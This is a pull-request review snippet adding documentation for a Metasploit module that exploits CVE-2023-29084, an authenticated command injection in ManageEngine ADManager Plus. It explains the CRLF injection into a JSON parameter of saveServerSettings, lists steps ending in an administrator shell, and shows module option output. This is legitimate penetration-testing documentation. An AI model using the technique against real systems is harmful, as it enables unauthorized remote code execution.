documentation/modules/exploit/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.md

```diff
@@ -0,0 +1,110 @@
+parameter containing a JSON array object that has a `USERNAME` or `PASSWORD` element containing a 
+carriage return and newline, followed by the command the attacker wishes to execute, an attacker can gain RCE as the user
+running ADManager Plus, which will typically be the local administrator. 
+
+Note that the attacker must be authenticated in order to send requests to `/api/json/admin/saveServerSettings`, 
+so this vulnerability does require authentication to exploit.
+
+## Verification Steps
+
+1. Set up a Windows Server target as a domain controller server.
+2. Download https://web.archive.org/web/20220926012908if_/https://download.manageengine.com/products/ad-manager/13024552/ManageEngine_ADManager_Plus_64.exe onto the target and run through the setup window, accepting defaults.
+3. Start `msfconsole`
+4. `set RHOST *target IP*`
+5. `set LHOST *local IP address*`
+6. `set SRVHOST *local IP address*` <- This step is optional depending on payload.
+7. `exploit`
+8. You should get a shell back as the local administrator user on the target machine.
+
+## Options
+
+### USERNAME
+Username to log into ADManager Plus as.
+
+### PASSWORD
+Password to log into ADManager Plus with.
+
+### DOMAIN
+Domain to log into ADManager Plus with or `ADManager Plus Authentication`.
+
+## Scenarios
+
+### ManageEngine ADManager Plus Build 7151 on Windows Server 2022
+```
+msf6 exploit(windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection) > show options
+
+Module options (exploit/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   PASSWORD  admin            yes       The password to log in with
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS    192.168.64.137   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     8080             yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                    no        The URI to use for this exploit (default is random)
+   USERNAME  admin            yes       The user to log into ADManager Plus as
+   VHOST                      no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  192.168.64.128   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
```

Comment:
I think this output needs to be regenerated right?

Reply:
Yep your right it does, I'll regenerate this.

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/18018/commits/85f874a6d7b6c188eca83cd16d885b88a501f04e